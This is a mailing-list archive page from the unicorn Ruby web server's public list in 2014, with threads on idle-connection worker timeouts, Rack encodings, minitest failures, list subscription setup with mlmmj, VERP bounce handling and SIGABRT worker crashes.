uses a database connection to Oracle, the other app uses a 3rd Party API
(still on location, but across the network).  The ping times to both of
these devices are extremely fast, however 30 minutes of inactivity across
the Firewall seems to disconnect these connections.  At least that appears
to be what the strace is telling me.  The place in the strace that the
timeout occurs is consistent, every time.  For example the strace of the
app that connects to Oracle shows this:

pid  7825] write(14,
"\0\373\0\0\6\0\0\0\0\0\21iB\376\377\377\377\377\377\377\377\1\0\0\0\0\0\0\0\v\0\0\0\3^Ca\201\0\0\0\0\0\0\376\377\377\377\377\377\377\377\22\0\0\0\376\377\377\377\377\377\377\377\r\0\0\0\376\377\377\377\377\377\377\377\376\377\377\377\377\377\377\377\0\0\0\0d\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\376\377\377\377\377\377\377\377\0\0\0\0\0\0\0\0\376\377\377\377\377\377\377\377\376\377\377\377\377\377\377\377\376\377\377\377\377\377\377\377\0\0\0\0\0\0\0\0\376\377\377\377\377\377\377\377\376\377\377\377\377\377\377\377\22select
1 from
dual\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0",
251) = 251
[pid  7825] read(14,  <unfinished ...>
[pid  7827] +++ killed by SIGKILL +++
PANIC: handle_group_exit: 7827 leader 7825
[pid  7846] +++ killed by SIGKILL +++
PANIC: handle_group_exit: 7846 leader 7825
+++ killed by SIGKILL +++

Clearly that is a database query 'select 1 from dual'.  It times out trying
to read the response.  At the same time if I watch the lsof -p <pid>, I see
that the database connection drops after 30 minutes.
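
One generic mitigation (an assumption about this setup, not something
confirmed in this thread) is to verify the ActiveRecord connection at the
start of each request so a dropped idle connection gets re-established:

  # Rack middleware sketch; assumes ActiveRecord.  Whether it helps depends
  # on how the firewall drops the connection -- a silent drop can still
  # stall until TCP gives up, so TCP keepalive or a DB-side idle timeout
  # may be needed as well.
  class VerifyDbConnection
    def initialize(app)
      @app = app
    end

    def call(env)
      ActiveRecord::Base.connection.verify!  # reconnects if the connection died
      @app.call(env)
    end
  end

The 3rd-party API connection would need its own keepalive or reconnect
handling.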

I'll update this thread again once it is solved, for historical and future
issues (in case someone else experiences something similar).

Again thank you for your help Eric!


On Mon, Aug 4, 2014 at 4:46 PM, Eric Wong <e@80x24.org> wrote:

> Eric Wong <e@80x24.org> wrote:
> > Did you try strace-ing for 30 minutes and reproducing the error?
>
> You can also try setting the unicorn timeout to longer than 30
> minutes and get a longer/stalled strace.
>


^ permalink raw reply	[relevance 2%]

* Weird Unicorn Timeout Issues (Hibernation problem?)
@ 2014-08-04 18:12  2% Tony Devlin
    0 siblings, 1 reply; 200+ results
From: Tony Devlin @ 2014-08-04 18:12 UTC (permalink / raw)
  To: unicorn-public

Current Setup:  (the problem existed before updating nginx, unicorn and
rails; but in an attempt to solve the problem I updated them).

CentOS 6.3 (x64)
Ruby 2.1.2p95
Rails 4.0.0
Nginx 1.6.0
Unicorn 4.8.3

====

We have an issue where, if a site is not accessed for around 30 minutes
(on average), the next request will time out, and it will time out on all of
the open workers.  I.e., if I have two workers, then both of those workers
will time out, even if the first one, after timing out, starts to work.  As
soon as the second worker is called upon it will time out.  Then everything
runs perfectly well until the site is not accessed for 30 minutes or more.
Then the timeout issue starts all over again.

This happens on our dev machine on two different applications (only apps on
the server) and on our production machine (also running two apps).

I can't figure out exactly what is going on.  I tried stracing the master
unicorn process, but I get no relevant information.   One of the
applications is also tied to a New Relic account and it gives no
information either.

Nginx logs show this: (sorry, obfuscated certain details due to the
internal enterprise nature)

2014/08/04 11:31:21 [error] 6353#0: *339 upstream prematurely closed
connection while reading response header from upstream, client: *.*.*.*,
server: ****.org, request: "GET /assets/application.css HTTP/1.1",
upstream:
"http://unix:/var/www/sites/****/shared/sockets/.unicorn.sock.0:/assets/application.css",
host: "****.org", referrer: "http://****.org/outages"

2014/08/04 11:31:53 [error] 31058#0: *1 upstream prematurely closed
connection while reading response header from upstream, client: *.*.*.*,
server: ****.org, request: "GET /outages HTTP/1.1", upstream:
"http://unix:/var/www/sites/****/shared/sockets/.unicorn.sock.0:/outages",
host: "****.org", referrer: "http://****.org/outages"

Unicorn stderr shows this: (sorry, obfuscated certain details due to the
internal enterprise nature)

E, [2014-08-04T11:31:21.620379 #11991] ERROR -- : worker=1 PID:29701
timeout (21s > 20s), killing
E, [2014-08-04T11:31:21.630521 #11991] ERROR -- : reaped #<Process::Status:
pid 29701 SIGKILL (signal 9)> worker=1
I, [2014-08-04T11:31:21.639881 #30521]  INFO -- : worker=1 ready

E, [2014-08-04T11:31:53.666300 #11991] ERROR -- : worker=0 PID:29705
timeout (21s > 20s), killing
E, [2014-08-04T11:31:53.676984 #11991] ERROR -- : reaped #<Process::Status:
pid 29705 SIGKILL (signal 9)> worker=0
I, [2014-08-04T11:31:53.687157 #30528]  INFO -- : worker=0 ready

It's interesting that the timeout occurs at different stages: for
example, if you look at the two nginx errors, one timed out at
/assets/application.css and the other at the root /outages/, and I've had it
be small gifs as well.   I'd also like to point out
that I have changed the timeout from 30s to 60s to 300s to 20s and it
occurs at every interval.  So it is not a "true" timeout issue.    Also, the
two apps on the server are completely different, with only Ruby and Rails
in common.  The
gems are different in both, the database is different in both; in fact one
of them has no assets, no css and no ui files at all.  The only
similarities are Ruby, Rails, Nginx and Unicorn.

It's like there is some sort of hibernation problem with the unicorn
workers.  The hibernation thought comes from these debug messages (I
switched to recording debug messages while trying to locate the problem).  I get
these every now and then:

D, [2014-08-03T22:14:49.776538 #11991] DEBUG -- : waiting 11.0s after
suspend/hibernation

But then they cease to occur for days; for example, that message was the last
time it occurred (none in the logs for today).

I've been trying for the past 4 days to solve this, making a large number of
changes to no avail.  Any help would be GREATLY appreciated.


^ permalink raw reply	[relevance 2%]

* Re: Please move to github
  @ 2014-08-02 20:15  3%     ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2014-08-02 20:15 UTC (permalink / raw)
  To: Gary Grossman; +Cc: unicorn-public, michael

Gary Grossman <gary.grossman@gmail.com> wrote:
> We'd pretty much need to introduce some kind of configuration
> switch, at least for the short term and maybe for the long term.
> The hope would be that it could become the default setting.
> Apps that don't use UTF8 should be able to set their desired default
> external encoding appropriately.

If possible, I would like to avoid an option and rely on
Encoding.default_external in a new major version.  Too many ways to set
the same thing is confusing and requires extra documentation overhead.

> >The rack-devel mailing list had a discussion on this in September 2010
> >and a decision was never reached. You can search the archives at:
> >http://groups.google.com/group/rack-devel
> 
> I came across this thread but didn't realize that was the last word
> so far when it came to Rack and encodings.
> 
> This might be one of those instances where it would be helpful for
> implementation to lead specification. Unicorn is one of the leading
> servers of its genre, if not the leader. If you supported a switch
> that made the encoding regime more sane, I think other popular servers
> like Thin and Passenger would swiftly follow and it might re-energize
> the discussion about getting encodings into the Rack spec once and
> for all, and give a base for experimentation and iteration for
> getting the encodings in the spec right.

I might start with WEBrick (or the Rack/WEBrick handler).  WEBrick is
distributed with Ruby and maintained by the core team.  It's not used in
production much, but it is the reference implementation which is usable
from all Ruby implementations.

naruse (from that rack-devel thread) is also active in Ruby core and
is very knowledgeable in these areas.

> Thanks again for reviewing the patch. I'll work on a new patch that
> incorporates your comments and has a switch for enabling/disabling
> the functionality, and I'll try to follow roughly what the spec
> group in 2010 thought would make sense in terms of encodings for
> the various strings in the env. And I'll see if I can ask the
> Rack folks to chime in.

Definitely get other Rack folks to chime in, even if it is a
unicorn-only change.  This has been a problem for years already,
so taking more time to get things right won't hurt.

^ permalink raw reply	[relevance 3%]

* Re: [PATCH] tests: switch to minitest
  @ 2014-05-13  1:13  2%     ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2014-05-13  1:13 UTC (permalink / raw)
  To: Ken Dreyer; +Cc: unicorn-public, mongrel-unicorn

Ken Dreyer <ktdreyer@ktdreyer.com> wrote:
> I am seeing one failure with the final assert in
> TestSocketHelper#test_bind_listen_unix_rebind, but I don't think
> that's a result of this, right?

That's a new failure for me.  Sorry about the lack of info in my
original response :x

I'm failing on minitest 5.3.3, 4.7.5 seems fine, in fact.

Below the output of "make -j8 test-unit V=1" on my machine (Ruby 2.1),
same failures on trunk, too (with minitest 5.3.3 installed)

: 
:   1) Failure:
: TestSocketHelper#test_bind_listen_unix_rebind [test/unit/test_socket_helper.rb:123]:
: Failed assertion, no message given.

<snip>

:   1) Failure:
: TestStreamInput#test_big_body_multi [test/unit/test_stream_input.rb:89]:
: Failed assertion, no message given.
: 
: 
:   2) Failure:
: TestStreamInput#test_gets_long [test/unit/test_stream_input.rb:110]:
: Failed assertion, no message given.
: 
make: *** [test/unit/test_stream_input.rb] Error 1

<snip>

:   1) Failure:
: TestTeeInput#test_gets_short [test/unit/test_tee_input.rb:69]:
: Failed assertion, no message given.
: 
: 
:   2) Failure:
: TestTeeInput#test_big_body_multi [test/unit/test_tee_input.rb:150]:
: Failed assertion, no message given.
: 
: 
:   3) Failure:
: TestTeeInput#test_chunked_ping_pong [test/unit/test_tee_input.rb:216]:
: Failed assertion, no message given.
: 
: 
:   4) Failure:
: TestTeeInput#test_chunked [test/unit/test_tee_input.rb:185]:
: Failed assertion, no message given.
: 
: 
:   5) Failure:
: TestTeeInput#test_chunked_with_trailer [test/unit/test_tee_input.rb:244]:
: Failed assertion, no message given.
: 
: 
:   6) Failure:
: TestTeeInput#test_gets_long [test/unit/test_tee_input.rb:50]:
: Failed assertion, no message given.
: 
: 
:   7) Failure:
: TestTeeInput#test_read_in_full_if_content_length [test/unit/test_tee_input.rb:123]:
: Failed assertion, no message given.
: 
: 12 runs, 57449 assertions, 7 failures, 0 errors, 0 skips
make: *** [test/unit/test_tee_input.rb] Error 1

^ permalink raw reply	[relevance 2%]

* subscription to new ML probably working...
@ 2014-05-08  8:43  2% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2014-05-08  8:43 UTC (permalink / raw)
  To: mongrel-unicorn; +Cc: unicorn-public

I'll migrate everybody else over around 20140514T20:00Z, otherwise you
might get duplicate messages from being subscribed to both lists.
If you're willing to deal with dupes for a few days, you can try
subscribe/unsubscribe/help commands:

	unicorn-public+subscribe@bogomips.org
	unicorn-public+unsubscribe@bogomips.org
	unicorn-public+help@bogomips.org
	(help will tell you the rest)

Stop reading here unless you're interested in implementation details :>

I only have mlmmj configured to handle the +commands, outgoing SMTP,
and bounces.  It does not receive normal list traffic like a standard
mlmmj install.  Instead, I have it configured to replay data from ssoma
every minute, so I used (as the mlmmj user):

    NAME=unicorn-public
    URL=git://bogomips.org/unicorn-public.git
    ssoma add $NAME $URL "command:ssoma-replay -L $HOME/spool/$NAME"

Where ssoma-replay is a tiny shell script which reads from stdin:
------------------------------8<--------------------------
#!/bin/sh
# save the message arriving on stdin to a temporary file
MSG=$(mktemp -t ssoma-replay.orig.$USER.XXXXXX || exit 1)
cat > "$MSG"
# hand the saved message to mlmmj for delivery to list subscribers
exec /usr/bin/mlmmj-send "$@" -m "$MSG"
------------------------------8<--------------------------
This means it should be easy to have outgoing SMTP on a different server
and allow other folks to run the same service.

Other notes: mlmmj has defaults I like out-of-the-box (unlike mailman,
ugh).  However, archive retrieval with mlmmj is rather painful,
but we have public-inbox and ssoma :)

[1] http://mlmmj.org/

^ permalink raw reply	[relevance 2%]

* handling SMTP subscribers to public-inboxen
  2014-05-07 10:52  3%       ` Alejandro Riera
@ 2014-05-07 19:54  0%         ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2014-05-07 19:54 UTC (permalink / raw)
  To: meta
  Cc: Lin Jen-Shin (godfat), Liste Unicorn, Jérémy Lecour,
	Alejandro Riera, Bráulio Bhavamitra, unicorn-public

Alejandro Riera <ariera@gmail.com> wrote:
> "Lin Jen-Shin (godfat)" <godfat@godfat.org> wrote:
> > I guess I am too lazy/busy to dig into this, so an SMTP would be great
> > for me. I am also ok to be listed as a public subscriber.
> 
> Same here, SMTP sounds great :)

Copying discussion to the meta@public-inbox.org list...

Thanks all for your response.  I'll set up something on the ssoma side
which replays messages to subscribers.  This will make it easy to
fork/migrate subscription lists to different servers.

I'll probably use VERP[1] to handle bounces.  However, most of the
normal bounce processing mechanisms (including VERP) seem to leave
users open to malicious unsubscribes.  In other words, an attacker
may fake bounce messages to take users off a list (VERP or not).
The reference documentation for VERP just makes faking bounces
trivially easy.

So I think we need to make the bounce address unguessable by the
attacker.  Perhaps using something like Crypt-VERPString[2] is
necessary?  Keep in mind somebody sniffing your plain-text SMTP traffic
will (and will always) be able to extract the bounce address; so this
only increases the difficulty level to do a malicious unsubscribe.

The secret key should be able to change when migrating between servers
(or if compromised) without being a big problem, as most bounces occur
hours/days within delivery time; not months/years afterwards.

[1] http://cr.yp.to/proto/verp.txt
[2] http://search.cpan.org/dist/Crypt-VERPString
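
A rough sketch of the unguessable-bounce-address idea (the address format
and secret handling here are made up for illustration): embed an HMAC of
the subscriber address in the VERP return path and ignore bounces whose
tag does not verify.

  require 'openssl'

  SECRET = File.read('/path/to/verp.secret').chomp  # placeholder; rotate freely

  # e.g. unicorn-public+bnc-user=example.com-1a2b3c4d@bogomips.org
  def bounce_address(subscriber)
    tag = OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('SHA1'), SECRET, subscriber)[0, 8]
    "unicorn-public+bnc-#{subscriber.tr('@', '=')}-#{tag}@bogomips.org"
  end

  # only honor a bounce when the tag matches what we would have generated
  def genuine_bounce?(encoded_subscriber, tag)
    subscriber = encoded_subscriber.tr('=', '@')
    expected = OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('SHA1'), SECRET, subscriber)[0, 8]
    expected == tag  # a constant-time compare would be slightly better
  end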

^ permalink raw reply	[relevance 0%]

* Re: [ANN] unicorn 4.8.3 - the end of an era
  @ 2014-05-07 10:52  3%       ` Alejandro Riera
  2014-05-07 19:54  0%         ` handling SMTP subscribers to public-inboxen Eric Wong
  0 siblings, 1 reply; 200+ results
From: Alejandro Riera @ 2014-05-07 10:52 UTC (permalink / raw)
  To: Lin Jen-Shin (godfat)
  Cc: Eric Wong, Liste Unicorn, Jérémy Lecour, unicorn-public

> I guess I am too lazy/busy to dig into this, so an SMTP would be great
> for me. I am also ok to be listed as a public subscriber.

Same here, SMTP sounds great :)

^ permalink raw reply	[relevance 3%]

* Re: Does unicorn waits after_work to consider a worker ready?
  @ 2014-05-01 19:00  2%       ` Bráulio Bhavamitra
  0 siblings, 0 replies; 200+ results
From: Bráulio Bhavamitra @ 2014-05-01 19:00 UTC (permalink / raw)
  To: Eric Wong; +Cc: Unicorn, unicorn-public

On Thu, May 1, 2014 at 3:18 PM, Eric Wong <normalperson@yhbt.net> wrote:
> Bráulio Bhavamitra <braulio@eita.org.br> wrote:
>> On Wed, Apr 30, 2014 at 10:33 PM, Eric Wong <normalperson@yhbt.net> wrote:
>> > You do not need to sleep before warmup.
>> Warm up requests are expensive. This sleep based on worker.nr makes
>> warm up happen worker by worker, not all at once.
>
> The worker might just be processing the expensive request in a
> user-visible state, correct?
>
> Modern Linux (and I expect most OSes people use nowadays) are great at
> dividing CPU-intensive work fairly.  Of course, if there's disk
> intensive load, that's a different case.
Yeah, I see that frequently on top.

But if all workers are warming up at once, say 10 workers, then the
old workers will slow down while serving requests, as CPU will be heavily used
by the warming-up workers. That is the main reason to slow down warm up.
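
For reference, that staggering can be written as a plain after_fork hook;
the 15s spacing and the warm-up path are arbitrary, and it assumes
preload_app true so server.app is already built:

  # unicorn.rb (sketch): stagger per-worker warm-up so freshly forked
  # workers do not all burn CPU at the same time.
  after_fork do |server, worker|
    sleep(worker.nr * 15)  # worker 0 warms up immediately, worker 1 after 15s, ...
    require 'rack/mock'
    # run the expensive first request before this worker starts accepting connections
    Rack::MockRequest.new(server.app).get('/')
  end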

>
>> > The master never pushes requests to a worker.  The key to unicorn is the
>> > workers pull requests directly from the kernel queue.  The master is
>> > never involved with distributing requests to the worker.
>> Nice! So the kernel "sees" that worker is sleeping and should not pass
>> a request to it, I guess.
>
> Almost, but the kernel socket queueing doesn't really see.  It's more
> like the kernel just puts food on the table continuously without caring
> if workers are eating.  Sometimes the table overflows and food gets
> thrown in the trash when the workers are all sleeping or full.
Interesting... So the queue knows about sleeping workers, but we have
to prevent all workers from sleeping at the same time.

>
>> > On a side note, your config is depressingly long and complex :<
>> > Try to make your apps run well without needing unicorn-worker-killer,
>> > at least...
>> That's the ruby fate... Apps inevitably grow memory over time.
>
> Only if you let bugs stay around.
>
> If you find bugs in Ruby or the libs you use, please report and help get
> them fixed.  Ruby 2.1 had some corner cases, true, but we need to help
> fight against bloated apps.
That's the ruby design, as the heap only grows, so with a request that
loads a lot of data the heap will grow big and never shrink.
http://izumi.plan99.net/blog/index.php/2007/10/12/how-the-ruby-heap-is-implemented/

Does Ruby 2.1 change that? We will soon migrate to ruby 2.1, but we are
not ready for it yet.

>
> ...and bloated email signatures :P
:P


-- 
"Lute pela sua ideologia. Seja um com sua ideologia. Viva pela sua
ideologia. Morra por sua ideologia" P.R. Sarkar

EITA - Educação, Informação e Tecnologias para Autogestão
http://cirandas.net/brauliobo
http://eita.org.br

"Paramapurusha é meu pai e Parama Prakriti é minha mãe. O universo é
meu lar e todos nós somos cidadãos deste cosmo. Este universo é a
imaginação da Mente Macrocósmica, e todas as entidades estão sendo
criadas, preservadas e destruídas nas fases de extroversão e
introversão do fluxo imaginativo cósmico. No âmbito pessoal, quando
uma pessoa imagina algo em sua mente, naquele momento, essa pessoa é a
única proprietária daquilo que ela imagina, e ninguém mais. Quando um
ser humano criado mentalmente caminha por um milharal também
imaginado, a pessoa imaginada não é a propriedade desse milharal, pois
ele pertence ao indivíduo que o está imaginando. Este universo foi
criado na imaginação de Brahma, a Entidade Suprema, por isso a
propriedade deste universo é de Brahma, e não dos microcosmos que
também foram criados pela imaginação de Brahma. Nenhuma propriedade
deste mundo, mutável ou imutável, pertence a um indivíduo em
particular; tudo é o patrimônio comum de todos."
Restante do texto em
http://cirandas.net/brauliobo/blog/a-problematica-de-hoje-em-dia

^ permalink raw reply	[relevance 2%]

* Re: Workers reaped with SIGABRT - how to debug?
  2014-04-15  8:00  3% Workers reaped with SIGABRT - how to debug? Henrik Nyh
  2014-04-15  8:43  0% ` Eric Wong
@ 2014-04-28  9:25  0% ` Henrik Nyh
  1 sibling, 0 replies; 200+ results
From: Henrik Nyh @ 2014-04-28  9:25 UTC (permalink / raw)
  To: unicorn list; +Cc: Eric Wong

I think we have solved this issue.

It was simply that monit did a "kill -6" (SIGABRT) when the process
used too much memory, so we bumped that limit for now. D'oh. We've yet
to research why it used that much memory.

On Tue, Apr 15, 2014 at 10:00 AM, Henrik Nyh <henrik@barsoom.se> wrote:
> We get errors like this one a few times a day:
>
>     Apr 13 12:16:31 app1 unicorn.log:  E, [2014-04-13T12:16:31.302011
> #17269] ERROR -- : reaped #<Process::Status: pid 17300 SIGABRT (signal
> 6)> worker=2
>
> We use Unicorn 4.8.2, Ruby 2.1.1 and a Ruby on Rails app.
>
> It doesn't seem to happen at any obvious time, like during or just
> after deploys.
>
> We were previously on Ruby 1.9.3 with Unicorn 4.8.0. Then we had
> almost the same issue but with SIGIOT, I believe. Then we upgraded
> Ruby to 2.1.1. I believe that's when it changed to SIGABRT. Then we
> upgraded Unicorn to 4.8.2 with no improvement.
>
> We're not sure how to debug this - any suggestions on either what the
> problem could be, or how to debug it?

^ permalink raw reply	[relevance 0%]

* Re: Is there a cleaner way of hooking into the event loop?
  @ 2014-04-23  1:30  3% ` Michael Fischer
  2014-04-23  2:04  0%   ` Sam Saffron
  0 siblings, 1 reply; 200+ results
From: Michael Fischer @ 2014-04-23  1:30 UTC (permalink / raw)
  To: unicorn list

On Tue, Apr 22, 2014 at 6:21 PM, Sam Saffron <sam.saffron@gmail.com> wrote:
> I am spawning sidekiqs from the master process so I share memory
> better, added this patch
>
> https://github.com/discourse/discourse/commit/4aaedb82d09d53159a99c3c94c0232c3cf5b0725
>
> Thing is I need to be in the master thread for both checks and
> spawning cause of this https://bugs.ruby-lang.org/issues/9751
>
> Is there a cleaner way to hook in?

>From an operational perspective this seems like a significant
premature optimization.  I'd think twice before doing it.  IME you
really don't want asynchronous job handling in the same process space
as a synchronous preforking webserver.  Best to keep your concerns
separated.  And RAM is cheap.

--Michael

^ permalink raw reply	[relevance 3%]

* Re: Is there a cleaner way of hooking into the event loop?
  2014-04-23  1:30  3% ` Michael Fischer
@ 2014-04-23  2:04  0%   ` Sam Saffron
  0 siblings, 0 replies; 200+ results
From: Sam Saffron @ 2014-04-23  2:04 UTC (permalink / raw)
  To: unicorn list

"like a significant premature optimization."

Funny, tell that to the people freaking out about Discourse's minimum
RAM requirements :), it clearly saves 50-60MB on PSS which is pretty
handy.

On Wed, Apr 23, 2014 at 11:30 AM, Michael Fischer <mfischer@zendesk.com> wrote:
> On Tue, Apr 22, 2014 at 6:21 PM, Sam Saffron <sam.saffron@gmail.com> wrote:
>> I am spawning sidekiqs from the master process so I share memory
>> better, added this patch
>>
>> https://github.com/discourse/discourse/commit/4aaedb82d09d53159a99c3c94c0232c3cf5b0725
>>
>> Thing is I need to be in the master thread for both checks and
>> spawning cause of this https://bugs.ruby-lang.org/issues/9751
>>
>> Is there a cleaner way to hook in?
>
> >From an operational perspective this seems like a significant
> premature optimization.  I'd think twice before doing it.  IME you
> really don't want asynchronous job handling in the same process space
> as a synchronous preforking webserver.  Best to keep your concerns
> separated.  And RAM is cheap.
>
> --Michael

^ permalink raw reply	[relevance 0%]

* Re: Workers reaped with SIGABRT - how to debug?
    2014-04-15 10:34  3%     ` Aaron Suggs
@ 2014-04-16  7:08  0%     ` Henrik Nyh
  1 sibling, 0 replies; 200+ results
From: Henrik Nyh @ 2014-04-16  7:08 UTC (permalink / raw)
  To: unicorn list; +Cc: aaron

> Henrik, we had the same problem after upgrading to Ruby 2.1.1. My
> coworker Tieg Zaharia tracked it down to this bug with
> BigDecimal#to_d:
>
> https://bugs.ruby-lang.org/issues/9657
>
> He discusses a workaround (using BigDecimal coercion instead of #to_d).
>
> Worked for us.

Thank you! We'll look into that. We've definitely seen that error in CI.

I couldn't find any segfaults in our production logs by the way, but
I'm still not sure exactly where they would go. Have looked in our
production.log (at the default prod log level) and the unicorn.log.

(Sidenote: I think you have to CC everyone, not just reply to the
list, or it only goes to the web archives.)

^ permalink raw reply	[relevance 0%]

* Re: Workers reaped with SIGABRT - how to debug?
  @ 2014-04-15 10:34  3%     ` Aaron Suggs
  2014-04-16  7:08  0%     ` Henrik Nyh
  1 sibling, 0 replies; 200+ results
From: Aaron Suggs @ 2014-04-15 10:34 UTC (permalink / raw)
  To: unicorn list

Henrik, we had the same problem after upgrading to Ruby 2.1.1. My
coworker Tieg Zaharia tracked it down to this bug with
BigDecimal#to_d:

https://bugs.ruby-lang.org/issues/9657

He discusses a workaround (using BigDecimal coercion instead of #to_d).
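
That kind of substitution looks roughly like this (the variable names are
only illustrative; the real call sites depend on the app):

  require 'bigdecimal'
  require 'bigdecimal/util'

  x = 3.14                      # illustrative value; affected call sites are app-specific
  amount = x.to_d               # the #to_d style call being replaced
  amount = BigDecimal(x.to_s)   # workaround: explicit BigDecimal() coercion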

Worked for us.

-Aaron

On Tue, Apr 15, 2014 at 5:05 AM, Henrik Nyh <henrik@barsoom.se> wrote:
> On Tue, Apr 15, 2014 at 10:43 AM, Eric Wong <normalperson@yhbt.net> wrote:
>> This may be a bug in a C extension RubyGem or even Ruby itself.
>> Do you get core dumps + backtraces or any other error messages in the logs?
>
> You'd expect this to be in the Rails app's production.log, right? We
> added that to our logging service this morning - we'll check it the
> next time this error happens. Maybe we could also try to dig it up
> from archived logs.
>
>> Which OS/distribution is this?
>
> Ubuntu 12.04.1 LTS
>
>> Since you see SIGABRT/SIGIOT and not SIGSEGV, you might be crashing
>> inside the SIGSEGV handler of Ruby itself.
>>
>> Can you also try --enable-debug-env when you ./configure Ruby?
>
> I guess that would output more details to the Rails production.log in
> the event of a crash? Will look into that.
>
>> Thanks in advance for any more info you can provide!
>
> Thanks so much for the help! Much appreciated.
> _______________________________________________
> Unicorn mailing list - mongrel-unicorn@rubyforge.org
> http://rubyforge.org/mailman/listinfo/mongrel-unicorn
> Do not quote signatures (like this one) or top post when replying
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 3%]

* Re: Workers reaped with SIGABRT - how to debug?
  2014-04-15  8:00  3% Workers reaped with SIGABRT - how to debug? Henrik Nyh
@ 2014-04-15  8:43  0% ` Eric Wong
    2014-04-28  9:25  0% ` Henrik Nyh
  1 sibling, 1 reply; 200+ results
From: Eric Wong @ 2014-04-15  8:43 UTC (permalink / raw)
  To: unicorn list; +Cc: Henrik Nyh

Henrik Nyh <henrik@barsoom.se> wrote:
> We get errors like this one a few times a day:
> 
>     Apr 13 12:16:31 app1 unicorn.log:  E, [2014-04-13T12:16:31.302011
> #17269] ERROR -- : reaped #<Process::Status: pid 17300 SIGABRT (signal
> 6)> worker=2
> 
> We use Unicorn 4.8.2, Ruby 2.1.1 and a Ruby on Rails app.
 
> It doesn't seem to happen at any obvious time, like during or just
> after deploys.
> 
> We were previously on Ruby 1.9.3 with Unicorn 4.8.0. Then we had
> almost the same issue but with SIGIOT, I believe. Then we upgraded
> Ruby to 2.1.1. I believe that's when it changed to SIGABRT. Then we
> upgraded Unicorn to 4.8.2 with no improvement.
> 
> We're not sure how to debug this - any suggestions on either what the
> problem could be, or how to debug it?

This may be a bug in a C extension RubyGem or even Ruby itself.
Do you get core dumps + backtraces or any other error messages in the logs?
Which OS/distribution is this?

Since you see SIGABRT/SIGIOT and not SIGSEGV, you might be crashing
inside the SIGSEGV handler of Ruby itself.

Can you also try --enable-debug-env when you ./configure Ruby?
Thanks in advance for any more info you can provide!

(Btw, please keep everybody Cc:-ed since the mailing list is going
 in that direction, and rubyforge.org isn't very reliable in its
 final days.  New ML announcement in a few days).
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 0%]

* Workers reaped with SIGABRT - how to debug?
@ 2014-04-15  8:00  3% Henrik Nyh
  2014-04-15  8:43  0% ` Eric Wong
  2014-04-28  9:25  0% ` Henrik Nyh
  0 siblings, 2 replies; 200+ results
From: Henrik Nyh @ 2014-04-15  8:00 UTC (permalink / raw)
  To: mongrel-unicorn

We get errors like this one a few times a day:

    Apr 13 12:16:31 app1 unicorn.log:  E, [2014-04-13T12:16:31.302011
#17269] ERROR -- : reaped #<Process::Status: pid 17300 SIGABRT (signal
6)> worker=2

We use Unicorn 4.8.2, Ruby 2.1.1 and a Ruby on Rails app.

It doesn't seem to happen at any obvious time, like during or just
after deploys.

We were previously on Ruby 1.9.3 with Unicorn 4.8.0. Then we had
almost the same issue but with SIGIOT, I believe. Then we upgraded
Ruby to 2.1.1. I believe that's when it changed to SIGABRT. Then we
upgraded Unicorn to 4.8.2 with no improvement.

We're not sure how to debug this - any suggestions on either what the
problem could be, or how to debug it?
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 3%]

* Unicorn workers freeze from time to time
@ 2014-01-24 11:21  2% Artem Pyanykh
  0 siblings, 0 replies; 200+ results
From: Artem Pyanykh @ 2014-01-24 11:21 UTC (permalink / raw)
  To: mongrel-unicorn; +Cc: artem.pyanykh

A couple of days ago I noticed a strange thing - from time to time the server stops processing requests for a while. In the `top` output it looks like this:

* ten Unicorn workers process requests;
* then, for some reason, they stop doing anything. I mean, all ten workers have 'sleeping' status;
* they sleep for ten to fifteen seconds;
* and then suddenly all ten workers start processing requests again at the same time (lots of requests were queued during those ~10s);

I have the following setup:
nginx, unicorn 4.6.2, postgres, redis for sessions and cache.

My first thought was to blame redis (because if redis doesn't hand out sessions, all processes will wait for it), but that doesn't seem to be the case: while the unicorn workers are frozen, redis keeps serving other processes that do background jobs.

I don't understand the reason for this strange behaviour.

If someone has thoughts on the matter I would gladly check them. If you need additional information, just tell me what to do and I'll try to provide it.

Related question on StackOverflow - http://stackoverflow.com/questions/21329413/unicorn-workers-freeze-from-time-to-time

----------------
Best regards,
Artem Pyanykh



_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 2%]

* Re: Suggestion for Named Process
  2014-01-15 11:37  3% Suggestion for Named Process Bob McKinven
@ 2014-01-15 18:19  0% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2014-01-15 18:19 UTC (permalink / raw)
  To: unicorn list; +Cc: Bob McKinven

Bob McKinven <bob@gigglemania.co.uk> wrote:
> When running multiple rails apps on the same server it can become a
> pain identifying which 'unicorn_rails master’ process is running which
> app (can’t always tell from the user).
> 
> My suggestion is for a --name option to allow each process to be named
> individually.
> 
> E.g.  "unicorn_rails --name tiddles_unicorn -D" would show
> “tiddles_unicorn master” & “tiddles_unicorn worker[1]” when using PS

I suggest using -c to point to a location specific to the app:

	unicorn -c /path/to/tiddles/unicorn.conf.rb

Having too many options adds to confusion, and changing the executable
name part of the process title can also break tools like killall.

I also end up using something like this quite often (and even without
bundler, just using RubyGems only):

  http://mid.gmane.org/20110819022316.GA2951@dcvr.yhbt.net

> I can be cc’d at bob@gigglemania.co.uk.

Done :>
_______________________________________________
